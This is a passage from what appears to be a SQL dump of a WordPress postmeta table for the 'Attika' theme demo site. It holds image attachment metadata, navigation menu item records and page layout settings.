6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-5-300x375.png\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-5-600x372.png\";s:5:\"width\";i:600;s:6:\"height\";i:372;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"landing-vector-img-5-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51985,2946,'_wp_attachment_image_alt','d'),(51986,2620,'_wp_attachment_image_alt','j'),(51987,2784,'_wp_attached_file','2018/09/landing-print-img-8.jpg'),(51988,2784,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1060;s:6:\"height\";i:560;s:4:\"file\";s:31:\"2018/09/landing-print-img-8.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-print-img-8-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"landing-print-img-8-1024x541.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:541;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-print-img-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"landing-print-img-8-768x406.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:406;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"attika_mikado_image_square\";a:4:{s:4:\"file\";s:31:\"landing-print-img-8-650x560.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:560;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"attika_mikado_image_portrait\";a:4:{s:4:\"file\";s:31:\"landing-print-img-8-650x560.jpg\";s:5:\"width\";i:650;s:6:\"height\";i:560;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-print-img-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"landing-print-img-8-600x317.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:317;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-print-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"landing-print-img-8-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"landing-print-img-8-600x317.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:317;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-print-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(51989,2768,'_wp_attachment_image_alt','s'),(23690,2987,'_menu_item_type','custom'),(23691,2987,'_menu_item_menu_item_parent','0'),(23692,2987,'_menu_item_object_id','2987'),(23693,2987,'_menu_item_object','custom'),(23694,2987,'_menu_item_target',''),(23695,2987,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23696,2987,'_menu_item_xfn',''),(23697,2987,'_menu_item_url','#'),(23698,2987,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23699,2987,'_menu_item_icon','null'),(23700,2988,'_menu_item_type','custom'),(23701,2988,'_menu_item_menu_item_parent','0'),(23702,2988,'_menu_item_object_id','2988'),(23703,2988,'_menu_item_object','custom'),(23704,2988,'_menu_item_target',''),(23705,2988,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23706,2988,'_menu_item_xfn',''),(23707,2988,'_menu_item_url','#'),(23708,2988,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23709,2988,'_menu_item_icon','null'),(23710,2989,'_menu_item_type','custom'),(23711,2989,'_menu_item_menu_item_parent','0'),(23712,2989,'_menu_item_object_id','2989'),(23713,2989,'_menu_item_object','custom'),(23714,2989,'_menu_item_target',''),(23715,2989,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23716,2989,'_menu_item_xfn',''),(23717,2989,'_menu_item_url','#'),(23718,2989,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23719,2989,'_menu_item_icon','null'),(23720,2990,'_menu_item_type','custom'),(23721,2990,'_menu_item_menu_item_parent','0'),(23722,2990,'_menu_item_object_id','2990'),(23723,2990,'_menu_item_object','custom'),(23724,2990,'_menu_item_target',''),(23725,2990,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23726,2990,'_menu_item_xfn',''),(23727,2990,'_menu_item_url','#'),(23728,2990,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23729,2990,'_menu_item_icon','null'),(23730,2991,'_menu_item_type','custom'),(23731,2991,'_menu_item_menu_item_parent','0'),(23732,2991,'_menu_item_object_id','2991'),(23733,2991,'_menu_item_object','custom'),(23734,2991,'_menu_item_target',''),(23735,2991,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23736,2991,'_menu_item_xfn',''),(23737,2991,'_menu_item_url','#'),(23738,2991,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23739,2991,'_menu_item_icon','null'),(23740,2992,'_menu_item_type','custom'),(23741,2992,'_menu_item_menu_item_parent','0'),(23742,2992,'_menu_item_object_id','2992'),(23743,2992,'_menu_item_object','custom'),(23744,2992,'_menu_item_target',''),(23745,2992,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23746,2992,'_menu_item_xfn',''),(23747,2992,'_menu_item_url','#'),(23748,2992,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23749,2992,'_menu_item_icon','null'),(23750,2994,'_menu_item_type','custom'),(23751,2994,'_menu_item_menu_item_parent','0'),(23752,2994,'_menu_item_object_id','2994'),(23753,2994,'_menu_item_object','custom'),(23754,2994,'_menu_item_target',''),(23755,2994,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23756,2994,'_menu_item_xfn',''),(23757,2994,'_menu_item_url','#'),(23758,2994,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23759,2994,'_menu_item_icon','null'),(23760,2995,'_menu_item_type','custom'),(23761,2995,'_menu_item_menu_item_parent','0'),(23762,2995,'_menu_item_object_id','2995'),(23763,2995,'_menu_item_object','custom'),(23764,2995,'_menu_item_target',''),(23765,2995,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23766,2995,'_menu_item_xfn',''),(23767,2995,'_menu_item_url','#'),(23768,2995,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23769,2995,'_menu_item_icon','null'),(23770,2996,'_menu_item_type','custom'),(23771,2996,'_menu_item_menu_item_parent','0'),(23772,2996,'_menu_item_object_id','2996'),(23773,2996,'_menu_item_object','custom'),(23774,2996,'_menu_item_target',''),(23775,2996,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23776,2996,'_menu_item_xfn',''),(23777,2996,'_menu_item_url','#'),(23778,2996,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23779,2996,'_menu_item_icon','null'),(23780,2997,'_menu_item_type','custom'),(23781,2997,'_menu_item_menu_item_parent','0'),(23782,2997,'_menu_item_object_id','2997'),(23783,2997,'_menu_item_object','custom'),(23784,2997,'_menu_item_target',''),(23785,2997,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23786,2997,'_menu_item_xfn',''),(23787,2997,'_menu_item_url','#'),(23788,2997,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23789,2997,'_menu_item_icon','null'),(23790,2998,'_menu_item_type','custom'),(23791,2998,'_menu_item_menu_item_parent','0'),(23792,2998,'_menu_item_object_id','2998'),(23793,2998,'_menu_item_object','custom'),(23794,2998,'_menu_item_target',''),(23795,2998,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23796,2998,'_menu_item_xfn',''),(23797,2998,'_menu_item_url','#'),(23798,2998,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23799,2998,'_menu_item_icon','null'),(23800,2999,'_menu_item_type','custom'),(23801,2999,'_menu_item_menu_item_parent','0'),(23802,2999,'_menu_item_object_id','2999'),(23803,2999,'_menu_item_object','custom'),(23804,2999,'_menu_item_target',''),(23805,2999,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23806,2999,'_menu_item_xfn',''),(23807,2999,'_menu_item_url','#'),(23808,2999,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23809,2999,'_menu_item_type_menu','wide'),(23810,2999,'_menu_item_icon','null'),(23811,3000,'_menu_item_type','custom'),(23812,3000,'_menu_item_menu_item_parent','0'),(23813,3000,'_menu_item_object_id','3000'),(23814,3000,'_menu_item_object','custom'),(23815,3000,'_menu_item_target',''),(23816,3000,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23817,3000,'_menu_item_xfn',''),(23818,3000,'_menu_item_url','#'),(23819,3000,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23820,3001,'_menu_item_type','custom'),(23821,3001,'_menu_item_menu_item_parent','0'),(23822,3001,'_menu_item_object_id','3001'),(23823,3001,'_menu_item_object','custom'),(23824,3001,'_menu_item_target',''),(23825,3001,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23826,3001,'_menu_item_xfn',''),(23827,3001,'_menu_item_url','#'),(23828,3001,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23829,3002,'_menu_item_type','custom'),(23830,3002,'_menu_item_menu_item_parent','0'),(23831,3002,'_menu_item_object_id','3002'),(23832,3002,'_menu_item_object','custom'),(23833,3002,'_menu_item_target',''),(23834,3002,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23835,3002,'_menu_item_xfn',''),(23836,3002,'_menu_item_url','#'),(23837,3002,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23838,3003,'_menu_item_type','custom'),(23839,3003,'_menu_item_menu_item_parent','0'),(23840,3003,'_menu_item_object_id','3003'),(23841,3003,'_menu_item_object','custom'),(23842,3003,'_menu_item_target',''),(23843,3003,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23844,3003,'_menu_item_xfn',''),(23845,3003,'_menu_item_url','#'),(23846,3003,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23847,3004,'_menu_item_type','custom'),(23848,3004,'_menu_item_menu_item_parent','0'),(23849,3004,'_menu_item_object_id','3004'),(23850,3004,'_menu_item_object','custom'),(23851,3004,'_menu_item_target',''),(23852,3004,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23853,3004,'_menu_item_xfn',''),(23854,3004,'_menu_item_url','#'),(23855,3004,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23856,3005,'_menu_item_type','custom'),(23857,3005,'_menu_item_menu_item_parent','0'),(23858,3005,'_menu_item_object_id','3005'),(23859,3005,'_menu_item_object','custom'),(23860,3005,'_menu_item_target',''),(23861,3005,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23862,3005,'_menu_item_xfn',''),(23863,3005,'_menu_item_url','#'),(23864,3005,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23865,3006,'_menu_item_type','custom'),(23866,3006,'_menu_item_menu_item_parent','0'),(23867,3006,'_menu_item_object_id','3006'),(23868,3006,'_menu_item_object','custom'),(23869,3006,'_menu_item_target',''),(23870,3006,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23871,3006,'_menu_item_xfn',''),(23872,3006,'_menu_item_url','#'),(23873,3006,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23874,3007,'_menu_item_type','custom'),(23875,3007,'_menu_item_menu_item_parent','0'),(23876,3007,'_menu_item_object_id','3007'),(23877,3007,'_menu_item_object','custom'),(23878,3007,'_menu_item_target',''),(23879,3007,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23880,3007,'_menu_item_xfn',''),(23881,3007,'_menu_item_url','#'),(23882,3007,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23883,3008,'_menu_item_type','custom'),(23884,3008,'_menu_item_menu_item_parent','0'),(23885,3008,'_menu_item_object_id','3008'),(23886,3008,'_menu_item_object','custom'),(23887,3008,'_menu_item_target',''),(23888,3008,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23889,3008,'_menu_item_xfn',''),(23890,3008,'_menu_item_url','#'),(23891,3008,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23892,3009,'_menu_item_type','custom'),(23893,3009,'_menu_item_menu_item_parent','2990'),(23894,3009,'_menu_item_object_id','3009'),(23895,3009,'_menu_item_object','custom'),(23896,3009,'_menu_item_target',''),(23897,3009,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23898,3009,'_menu_item_xfn',''),(23899,3009,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(23900,3009,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23901,3009,'_menu_item_icon','null'),(23902,3010,'_menu_item_type','custom'),(23903,3010,'_menu_item_menu_item_parent','2990'),(23904,3010,'_menu_item_object_id','3010'),(23905,3010,'_menu_item_object','custom'),(23906,3010,'_menu_item_target',''),(23907,3010,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23908,3010,'_menu_item_xfn',''),(23909,3010,'_menu_item_url','#'),(23910,3010,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23911,3010,'_menu_item_icon','null'),(23912,3011,'_menu_item_type','custom'),(23913,3011,'_menu_item_menu_item_parent','2990'),(23914,3011,'_menu_item_object_id','3011'),(23915,3011,'_menu_item_object','custom'),(23916,3011,'_menu_item_target',''),(23917,3011,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23918,3011,'_menu_item_xfn',''),(23919,3011,'_menu_item_url','#'),(23920,3011,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23921,3011,'_menu_item_icon','null'),(23922,3012,'_menu_item_type','custom'),(23923,3012,'_menu_item_menu_item_parent','2997'),(23924,3012,'_menu_item_object_id','3012'),(23925,3012,'_menu_item_object','custom'),(23926,3012,'_menu_item_target',''),(23927,3012,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23928,3012,'_menu_item_xfn',''),(23929,3012,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(23930,3012,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23931,3012,'_menu_item_icon','null'),(23932,3013,'_menu_item_type','custom'),(23933,3013,'_menu_item_menu_item_parent','2997'),(23934,3013,'_menu_item_object_id','3013'),(23935,3013,'_menu_item_object','custom'),(23936,3013,'_menu_item_target',''),(23937,3013,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23938,3013,'_menu_item_xfn',''),(23939,3013,'_menu_item_url','#'),(23940,3013,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23941,3013,'_menu_item_icon','null'),(23942,3014,'_menu_item_type','custom'),(23943,3014,'_menu_item_menu_item_parent','2997'),(23944,3014,'_menu_item_object_id','3014'),(23945,3014,'_menu_item_object','custom'),(23946,3014,'_menu_item_target',''),(23947,3014,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23948,3014,'_menu_item_xfn',''),(23949,3014,'_menu_item_url','#'),(23950,3014,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23951,3014,'_menu_item_icon','null'),(23952,3015,'_menu_item_type','custom'),(23953,3015,'_menu_item_menu_item_parent','3002'),(23954,3015,'_menu_item_object_id','3015'),(23955,3015,'_menu_item_object','custom'),(23956,3015,'_menu_item_target',''),(23957,3015,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23958,3015,'_menu_item_xfn',''),(23959,3015,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(23960,3015,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23961,3016,'_menu_item_type','custom'),(23962,3016,'_menu_item_menu_item_parent','3007'),(23963,3016,'_menu_item_object_id','3016'),(23964,3016,'_menu_item_object','custom'),(23965,3016,'_menu_item_target',''),(23966,3016,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23967,3016,'_menu_item_xfn',''),(23968,3016,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(23969,3016,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23970,3017,'_menu_item_type','custom'),(23971,3017,'_menu_item_menu_item_parent','2992'),(23972,3017,'_menu_item_object_id','3017'),(23973,3017,'_menu_item_object','custom'),(23974,3017,'_menu_item_target',''),(23975,3017,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23976,3017,'_menu_item_xfn',''),(23977,3017,'_menu_item_url','#'),(23978,3017,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23979,3017,'_menu_item_icon','null'),(23980,3018,'_menu_item_type','custom'),(23981,3018,'_menu_item_menu_item_parent','2992'),(23982,3018,'_menu_item_object_id','3018'),(23983,3018,'_menu_item_object','custom'),(23984,3018,'_menu_item_target',''),(23985,3018,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23986,3018,'_menu_item_xfn',''),(23987,3018,'_menu_item_url','#'),(23988,3018,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23989,3018,'_menu_item_icon','null'),(23990,3019,'_menu_item_type','custom'),(23991,3019,'_menu_item_menu_item_parent','2992'),(23992,3019,'_menu_item_object_id','3019'),(23993,3019,'_menu_item_object','custom'),(23994,3019,'_menu_item_target',''),(23995,3019,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(23996,3019,'_menu_item_xfn',''),(23997,3019,'_menu_item_url','#'),(23998,3019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(23999,3019,'_menu_item_icon','null'),(24000,3020,'_menu_item_type','custom'),(24001,3020,'_menu_item_menu_item_parent','2992'),(24002,3020,'_menu_item_object_id','3020'),(24003,3020,'_menu_item_object','custom'),(24004,3020,'_menu_item_target',''),(24005,3020,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24006,3020,'_menu_item_xfn',''),(24007,3020,'_menu_item_url','#'),(24008,3020,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24009,3020,'_menu_item_icon','null'),(24010,3021,'_menu_item_type','custom'),(24011,3021,'_menu_item_menu_item_parent','2999'),(24012,3021,'_menu_item_object_id','3021'),(24013,3021,'_menu_item_object','custom'),(24014,3021,'_menu_item_target',''),(24015,3021,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24016,3021,'_menu_item_xfn',''),(24017,3021,'_menu_item_url','#'),(24018,3021,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24019,3021,'_menu_item_icon','null'),(24020,3022,'_menu_item_type','custom'),(24021,3022,'_menu_item_menu_item_parent','2999'),(24022,3022,'_menu_item_object_id','3022'),(24023,3022,'_menu_item_object','custom'),(24024,3022,'_menu_item_target',''),(24025,3022,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24026,3022,'_menu_item_xfn',''),(24027,3022,'_menu_item_url','#'),(24028,3022,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24029,3022,'_menu_item_icon','null'),(24030,3023,'_menu_item_type','custom'),(24031,3023,'_menu_item_menu_item_parent','2999'),(24032,3023,'_menu_item_object_id','3023'),(24033,3023,'_menu_item_object','custom'),(24034,3023,'_menu_item_target',''),(24035,3023,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24036,3023,'_menu_item_xfn',''),(24037,3023,'_menu_item_url','#'),(24038,3023,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24039,3023,'_menu_item_icon','null'),(24040,3024,'_menu_item_type','custom'),(24041,3024,'_menu_item_menu_item_parent','2999'),(24042,3024,'_menu_item_object_id','3024'),(24043,3024,'_menu_item_object','custom'),(24044,3024,'_menu_item_target',''),(24045,3024,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24046,3024,'_menu_item_xfn',''),(24047,3024,'_menu_item_url','#'),(24048,3024,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24049,3024,'_menu_item_icon','null'),(24050,3025,'_menu_item_type','custom'),(24051,3025,'_menu_item_menu_item_parent','2991'),(24052,3025,'_menu_item_object_id','3025'),(24053,3025,'_menu_item_object','custom'),(24054,3025,'_menu_item_target',''),(24055,3025,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24056,3025,'_menu_item_xfn',''),(24057,3025,'_menu_item_url','#'),(24058,3025,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24059,3025,'_menu_item_icon','null'),(24060,3026,'_menu_item_type','custom'),(24061,3026,'_menu_item_menu_item_parent','2998'),(24062,3026,'_menu_item_object_id','3026'),(24063,3026,'_menu_item_object','custom'),(24064,3026,'_menu_item_target',''),(24065,3026,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24066,3026,'_menu_item_xfn',''),(24067,3026,'_menu_item_url','#'),(24068,3026,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24069,3026,'_menu_item_icon','null'),(24070,3027,'_menu_item_type','custom'),(24071,3027,'_menu_item_menu_item_parent','2989'),(24072,3027,'_menu_item_object_id','3027'),(24073,3027,'_menu_item_object','custom'),(24074,3027,'_menu_item_target',''),(24075,3027,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24076,3027,'_menu_item_xfn',''),(24077,3027,'_menu_item_url','#'),(24078,3027,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24079,3027,'_menu_item_icon','null'),(24080,3028,'_menu_item_type','custom'),(24081,3028,'_menu_item_menu_item_parent','2996'),(24082,3028,'_menu_item_object_id','3028'),(24083,3028,'_menu_item_object','custom'),(24084,3028,'_menu_item_target',''),(24085,3028,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24086,3028,'_menu_item_xfn',''),(24087,3028,'_menu_item_url','#'),(24088,3028,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24089,3028,'_menu_item_icon','null'),(24090,3029,'_menu_item_type','custom'),(24091,3029,'_menu_item_menu_item_parent','2991'),(24092,3029,'_menu_item_object_id','3029'),(24093,3029,'_menu_item_object','custom'),(24094,3029,'_menu_item_target',''),(24095,3029,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24096,3029,'_menu_item_xfn',''),(24097,3029,'_menu_item_url','#'),(24098,3029,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24099,3029,'_menu_item_icon','null'),(24100,3030,'_menu_item_type','custom'),(24101,3030,'_menu_item_menu_item_parent','2991'),(24102,3030,'_menu_item_object_id','3030'),(24103,3030,'_menu_item_object','custom'),(24104,3030,'_menu_item_target',''),(24105,3030,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24106,3030,'_menu_item_xfn',''),(24107,3030,'_menu_item_url','#'),(24108,3030,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24109,3030,'_menu_item_icon','null'),(24110,3031,'_menu_item_type','custom'),(24111,3031,'_menu_item_menu_item_parent','0'),(24112,3031,'_menu_item_object_id','3031'),(24113,3031,'_menu_item_object','custom'),(24114,3031,'_menu_item_target',''),(24115,3031,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24116,3031,'_menu_item_xfn',''),(24117,3031,'_menu_item_url','#'),(24118,3031,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24119,3032,'_menu_item_type','custom'),(24120,3032,'_menu_item_menu_item_parent','2996'),(24121,3032,'_menu_item_object_id','3032'),(24122,3032,'_menu_item_object','custom'),(24123,3032,'_menu_item_target',''),(24124,3032,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24125,3032,'_menu_item_xfn',''),(24126,3032,'_menu_item_url','#'),(24127,3032,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24128,3032,'_menu_item_icon','null'),(24129,3033,'_menu_item_type','custom'),(24130,3033,'_menu_item_menu_item_parent','2996'),(24131,3033,'_menu_item_object_id','3033'),(24132,3033,'_menu_item_object','custom'),(24133,3033,'_menu_item_target',''),(24134,3033,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(24135,3033,'_menu_item_xfn',''),(24136,3033,'_menu_item_url','#'),(24137,3033,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24138,3033,'_menu_item_icon','null'),(24139,2,'_wp_page_template','default'),(24140,3,'_wp_page_template','default'),(24141,3034,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24142,3034,'_wp_page_template','default'),(24143,3034,'slide_template','default'),(24144,3034,'_wpb_vc_js_status','false'),(24145,3034,'mkdf_page_content_behind_header_meta','no'),(24146,3034,'mkdf_disable_vertical_header_background_image_meta','no'),(24147,3034,'mkdf_disable_header_widget_areas_meta','no'),(24148,3034,'mkdf_title_area_type_meta','attika'),(24149,3034,'mkdf_header_type_meta','header-divided'),(24150,3034,'mkdf_header_behaviour_meta','no-behavior'),(24151,3034,'mkdf_menu_area_background_color_meta','#ffffff'),(24152,3034,'mkdf_sidebar_layout_meta','sidebar-25-right'),(24153,3034,'mkdf_custom_sidebar_area_meta','shop-sidebar'),(24154,3034,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(24155,3034,'mkdf_page_content_padding','70px 0 100px'),(24156,3035,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24157,3035,'_wp_page_template','default'),(24158,3035,'slide_template','default'),(24159,3035,'_wpb_vc_js_status','false'),(24160,3035,'mkdf_page_content_behind_header_meta','no'),(24161,3035,'mkdf_disable_vertical_header_background_image_meta','no'),(24162,3035,'mkdf_disable_header_widget_areas_meta','no'),(24163,3035,'mkdf_title_area_type_meta','attika'),(24164,3035,'mkdf_page_content_padding','100px 0'),(24165,3035,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(24166,3035,'mkdf_menu_area_background_color_meta','#ffffff'),(24167,3036,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(24168,3036,'_wp_page_template','default'),(24169,3036,'slide_template','default'),(24170,3036,'_wpb_vc_js_status','false'),(24171,3036,'mkdf_page_content_behind_header_meta','no'),(24172,3036,'mkdf_disable_vertical_header_background_image_meta','no'),(24173,3036,'mkdf_disable_header_widget_areas_meta','no'),(24174,3036,'mkdf_title_area_type_meta','attika'),(24175,3036,'mkdf_menu_area_background_color_meta','#ffffff'),(24176,3036,'mkdf_custom_header_widget_area_two_meta','shop-header-widgets'),(24177,3036,'mkdf_page_content_padding','85px 0 